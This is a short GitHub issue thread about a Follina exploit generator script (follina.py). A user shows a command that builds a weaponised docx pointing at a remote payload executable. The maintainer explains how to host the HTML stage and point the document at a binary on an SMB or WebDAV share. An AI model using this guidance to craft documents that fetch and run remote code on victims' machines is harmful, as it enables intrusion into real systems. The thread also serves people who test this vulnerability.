Using a remote binary
GTP95 opened this issue · 2 comments
Hello,
I'm trying to test the remote version of the exploit in a more realistic setting, i.e. I'm actually uploading an executable to a web server and trying to specify the url with the -u switch. But I get an error that says that I have to specify the executable:
$ python follina.py -t docx -m binary -u https://www.example.com/my_payload.exe
Binary mode requires a binary to be specified, e.g. -b '\\localhost\c$\Windows\System32\calc.exe'
My understanding is that by supplying an URL the script should generate an exploit that tries to retrieve the executable from the web server instead of searching locally, am I getting this wrong?
Hi @GTP95! The -u
flag denotes where the document will try to retrieve the generated (HTML) payload from, it cannot be used to reference a binary directly. The -b
flag is used to define where the generated HTML payload will retrieve the binary payload from, which is the flag that you are looking for. You can define a network share there for remote payload retrieval.
An example, if you are hosting the generated payload.html
on a web server with domain, you could specify the -u
flag to be https://www.yourdomain.com/payload
. You can then use the -b
flag to point to the binary on a network file share. Potentially you could use a public SMB server of WebDAV but this is untested.
Hope this clarifies things!
Yes, I think I got it now. Thank you!